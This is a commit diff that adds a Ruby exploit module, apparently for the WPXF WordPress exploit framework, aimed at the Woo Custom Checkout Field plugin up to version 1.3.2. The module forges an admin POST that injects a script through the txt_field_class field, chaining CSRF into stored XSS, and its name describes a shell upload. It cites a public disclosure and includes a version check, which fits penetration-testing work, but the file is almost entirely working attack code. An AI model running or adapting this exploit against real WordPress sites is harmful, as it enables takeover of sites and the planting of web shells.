Add Woo Custom Checkout Field XSS module

Author: rastating

modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb

@@ -0,0 +1,41 @@
+class Wpxf::Exploit::WooCustomCheckoutFieldXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Woo Custom Checkout Field <= 1.3.2 XSS Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+      ],
+      references: [
+        ['URL', 'http://blog.rastating.com/woo-custom-checkout-field-1-3-2-csrf-stored-xss-disclosure']
+      ],
+      date: 'Jul 23 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('woo-custom-checkout-field', 'readme.txt', '1.3.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}?page=ccf_settings_menu', {
+        txt_field_name: '#{Utility::Text.rand_alpha(5)}',
+        txt_field_class: '<script>#{xss_include_script}<\\/script>',
+        txt_field_placeholder: '#{Utility::Text.rand_alpha(5)}',
+        txt_field_type: 'text',
+        txt_field_options: '',
+        add_field: ''
+      });
+    </script></body></html>
+    |
+  end
+end